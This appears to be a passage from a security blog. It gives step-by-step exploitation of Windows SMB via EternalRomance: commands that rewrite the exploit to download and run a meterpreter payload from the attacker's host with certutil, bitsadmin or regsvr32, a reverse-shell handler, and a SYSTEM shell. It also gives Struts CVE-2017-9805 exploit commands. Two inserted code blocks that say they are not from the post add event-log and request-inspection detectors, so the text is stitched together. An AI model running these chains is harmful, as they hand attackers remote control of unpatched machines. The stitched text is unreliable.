sudo python -m SimpleHTTPServer 80

Bash Window #3 – Download EternalRomance, edit it, & exploit victim
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c certutil -urlcache -split -f http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

python EternalRomance.py [TargetIP] netlogon


If all goes well you should see a new meterpreter session open from your target. 🙂


Kali VM EternalRomance exploiting info:

It will be just about the same as the information above, except for a few different commands…

#1. – Test Target IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

*choose any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc…

#2 – Create Metasploit Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

#3. – Grab Exploit Scripts in console 2
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py

#4a. – Payload Choice #1 – Create EXE payload using bitsadmin dl and execute
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

#4b. – Payload Choice #2 – Create SCT payload with regsvr32 dl with scrobj.dll
git clone https://github.com/CroweCybersecurity/ps1encode .
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py

Credits for this regsvr32 payload idea: Sheila Berta / Casey Smith / CroweCybersecurity
#5. – Start Webserver
service apache2 start

##################################
# Exploit it(change the TargetIP and named pipe if you want)
python EternalRomance.py [TargetIP] netlogon

If all goes well a shell shall rain down on ya.
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
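Added example (not from the post and not sleepya's code): a small Python detector over constructed Windows event records, written from the defender's side of the chain the post walks through. The chain authenticates as Guest over SMB (event 4624, logon type 3), talks to a named pipe such as netlogon on IPC$ (event 5145), and runs its command through service_exec(), which on the target shows up as a newly installed service (event 7045) whose ImagePath is a certutil, bitsadmin or regsvr32 one-liner like the ones sed writes into EternalRomance.py above. The line format, field names, service name and timestamps here are simplified and constructed for the example; real Windows events need proper XML/EVTX parsing first.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime


@dataclass
class Event:
    ts: datetime
    event_id: str
    fields: dict = field(default_factory=dict)


LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<id>\d+) (?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
# Download-and-execute helpers used in the post's service_exec() one-liners.
LOLBIN_RE = re.compile(r"\b(certutil|bitsadmin|regsvr32|powershell|mshta|cscript|wscript)\b", re.I)
SUSPECT_PIPES = {"netlogon", "spoolss", "browser"}   # pipe names the post mentions

# Constructed sample records (not real logs): a Guest network logon, named-pipe
# access on IPC$, then a service install carrying the certutil one-liner, followed
# by ordinary administrator activity that must not alert.
SAMPLE_EVENTS = [
    "2017-09-30T05:08:30 4624 LogonType=3 Account=Guest Source=192.168.128.17",
    "2017-09-30T05:08:31 5145 Share=\\\\*\\IPC$ RelativeTarget=netlogon Account=Guest Source=192.168.128.17",
    "2017-09-30T05:08:32 7045 ServiceName=SVC_PLACEHOLDER ImagePath=cmd /c certutil -urlcache -split -f http://192.168.128.17/1.exe C:\\1.exe && C:\\1.exe",
    "2017-09-30T05:20:00 4624 LogonType=3 Account=svc_backup Source=10.0.0.5",
    "2017-09-30T05:20:05 7045 ServiceName=BackupAgent ImagePath=C:\\Program Files\\Backup\\agent.exe",
]


def parse_events(lines):
    """Parse 'timestamp id key=value ...' records; values may contain spaces."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        kv = dict(KV_RE.findall(m.group("rest")))
        events.append(Event(datetime.fromisoformat(m.group("ts")), m.group("id"), kv))
    return events


def detect(events, window_seconds=60):
    """Two rules: Guest touching a sensitive pipe on IPC$ (medium), and a service
    whose ImagePath runs a LOLBin (medium on its own, high when a Guest network
    logon landed within the preceding window, which is the exploit's footprint)."""
    alerts = []
    guest_logons = [e for e in events
                    if e.event_id == "4624"
                    and e.fields.get("LogonType") == "3"
                    and e.fields.get("Account", "").lower() == "guest"]
    for ev in events:
        if ev.event_id == "5145":
            if (ev.fields.get("Account", "").lower() == "guest"
                    and ev.fields.get("Share", "").endswith("IPC$")
                    and ev.fields.get("RelativeTarget", "").lower() in SUSPECT_PIPES):
                alerts.append({"kind": "guest_pipe_access", "severity": "medium",
                               "time": ev.ts.isoformat(), "source": ev.fields.get("Source"),
                               "detail": ev.fields["RelativeTarget"]})
        elif ev.event_id == "7045":
            image = ev.fields.get("ImagePath", "")
            if not LOLBIN_RE.search(image):
                continue
            prior = [lg for lg in guest_logons
                     if 0 <= (ev.ts - lg.ts).total_seconds() <= window_seconds]
            alerts.append({"kind": "lolbin_service",
                           "severity": "high" if prior else "medium",
                           "time": ev.ts.isoformat(),
                           "source": prior[-1].fields.get("Source") if prior else None,
                           "detail": f"{ev.fields.get('ServiceName', '?')}: {image}"})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Run it over SAMPLE_EVENTS and the Guest pipe access and the certutil service both alert, the service at high severity with the Guest logon's source address attached, while the backup agent's service install stays silent. The pipe_auditor check the post runs from msfconsole is the mirror image of the first rule: if your SMB servers still answer Guest on those pipes, that is the finding to fix before worrying about the detection.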

If I missed anything or something needs correcting hit me up on Twitter.

Equihax


In July, CVE-2017-9805 was reserved for the Apache Struts RCE vulnerability in the REST plugin. Apache Struts 2.5 through 2.5.12 using the REST plugin are vulnerable to this attack. It had an initial disclosure on 7/17/2017, and a patch was released recently on 9/5/2017, with Apache updating Struts to version 2.5.13. The flaw exists in using the Struts REST plugin with the XStream handler to handle XML payloads. If exploited correctly, it allows a remote unauthenticated attacker to run malicious code on the application server, either to take over the machine or to launch further attacks from it. The problem is in XStreamHandler's toObject() method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object. lgtm has an in-depth article, along with a press release from the Apache Foundation. The company lgtm, who discovered the CVE-2017-9805 vulnerability, warned that at least 65 percent of Fortune 100 companies use Struts, and they could all be exposed to remote attacks due to this vulnerability.

Equifax, one of the "big-three" U.S. credit bureaus, was most likely, and unfortunately, not watching the bleeding edge of security to prevent their server from being compromised. When they discovered the "unauthorized access" on July 29, they called in the security team from Mandiant to help them figure out the fallout of having potentially 143 million people's PII released to the hackers. They released a video on September 7th urging people to sign up on equifaxsecurity2017.com, which itself was a shitshow: along with being a poorly coded site, it was also flagged as a phishing site and didn't even seem to be looking up the data correctly, with people entering false info and still getting the same response from the site as a real account would. I'd be wary of submitting my information to that site, along with some reports that the wording on the site gives them a loophole so you can't be part of a class action lawsuit if that ever comes to fruition. Below is a video from the CEO of Equifax about the incident.


Rick Smith, Chairman and CEO of Equifax Inc., on cybersecurity incident involving consumer information. Equifax has established a dedicated website, www.equifaxsecurity2017.com, to help consumers determine if their information has been potentially impacted and to sign up for credit file monitoring and identity theft protection.


There's been speculation that this Struts vulnerability is how Equifax was owned. Looking into how the exploit can be recreated shows how easy it is for an attacker to take control of a server. The team from Metasploit created a module to trigger the CVE-2017-9805 vulnerability, released shortly after its disclosure.

For those who would like to try this out at home in your 'test' lab, you can quickly test this against your test server from a Linux box, like the Kali distro:
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
cp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/
Then run msfconsole and load the module by running:
use exploit/multi/http/struts2_rest_xstream
show options

Someone also anonymously released this gist on github the same day showing how you can simply exploit Struts.

Mazin Ahmed released some python code on his GitHub that lets you easily check a vulnerable server or list of servers.
Checking if the vulnerability exists against a single URL:
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
Exploiting a single URL:
python struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/struts-pwn'
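An added example (not from the post, the Metasploit module or struts-pwn): a Python request-inspection check that a WAF rule or proxy log parser could apply while the patch to 2.5.13 is rolled out. It follows from the root cause described above: the REST plugin's XStream handler instantiates whatever class the XML names, and a legitimate REST client never needs to name a Java class at all. The check therefore flags XML bodies to Struts whose elements carry fully qualified Java class names, and separately flags references to the command-execution classes. The two raw HTTP requests are constructed samples; the path and host are placeholders.

```python
import re

XML_CT_RE = re.compile(r"^content-type:\s*(application|text)/xml", re.I | re.M)
TARGET_RE = re.compile(r"^(POST|PUT)\s+(\S+)", re.M)
# An element named like a fully qualified Java class (two or more dotted lowercase
# package segments, then a class name) is the client telling XStream which type
# to build; REST payloads use aliased tags such as <order>, never that.
FQCN_TAG_RE = re.compile(r"<\s*((?:[a-z][a-z0-9]*\.){2,}[A-Za-z_$][\w$]*)\b")
COMMAND_CLASS_RE = re.compile(r"java\.lang\.(ProcessBuilder|Runtime)\b")

# Constructed sample requests (placeholders for host and application paths).
BENIGN_REQUEST = (
    "POST /struts2-rest-showcase/orders HTTP/1.1\r\n"
    "Host: example.com\r\nContent-Type: application/xml\r\n\r\n"
    "<order><clientName>Bob</clientName><amount>3</amount></order>"
)
SUSPECT_REQUEST = (
    "POST /struts2-rest-showcase/orders/3 HTTP/1.1\r\n"
    "Host: example.com\r\nContent-Type: application/xml\r\n\r\n"
    "<map><entry><java.lang.ProcessBuilder><command><string>PLACEHOLDER</string>"
    "</command></java.lang.ProcessBuilder></entry></map>"
)


def split_request(raw: str):
    """Separate the header block from the body of a raw HTTP/1.1 request."""
    head, _, body = raw.partition("\r\n\r\n")
    return head, body


def inspect_request(raw: str) -> dict:
    """Return the request path and the list of findings (empty means nothing odd).
    Only XML bodies are examined, because only those reach the XStream handler."""
    head, body = split_request(raw)
    m = TARGET_RE.search(head)
    result = {"path": m.group(2) if m else None, "findings": []}
    if not XML_CT_RE.search(head):
        return result
    if FQCN_TAG_RE.search(body):
        result["findings"].append("fqcn_element")
    if COMMAND_CLASS_RE.search(body):
        result["findings"].append("command_class")
    return result


def verdict(raw: str) -> str:
    """Collapse the findings into block / review / allow for a gateway policy."""
    findings = inspect_request(raw)["findings"]
    if "command_class" in findings:
        return "block"
    if findings:
        return "review"
    return "allow"


if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("suspect", SUSPECT_REQUEST)):
        print(name, inspect_request(req), verdict(req))
```

The fqcn_element rule is the one that generalizes: it does not depend on knowing which gadget class an attacker picks, only on the observation that a client-chosen type name has no place in a REST body. The same allow-list thinking is what the fixed Struts release applies on the server side, so the rule is a stopgap for the window before patching, not a substitute for it.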

So make sure you patch your server if you're running Struts; if you don't have a web server running Struts, then all you have to worry about is your identity being stolen if you're an American.
Sign up for credit monitoring if you can, and then freeze your credit files at the major credit bureaus. Information on how to file a freeze is available here.

CVE-2017-0213 – Windows COM EoP

I wrote another blog post for Milton Security about the details of a vulnerability that James Forshaw of Google Project Zero found in January, which exploits a bug in the Windows COM Aggregate Marshaler. An attacker can use this bug to elevate privileges on Windows machines.

Microsoft had 90 days to patch, which they did with last month's security updates. The post includes proof-of-concept code for 32- and 64-bit versions of Windows from Win7-10 and Server 2k8-2k16.
https://www.miltonsecurity.com/company/blog/cve-2017-0213-windows-com-privilege-escalation-vulnerability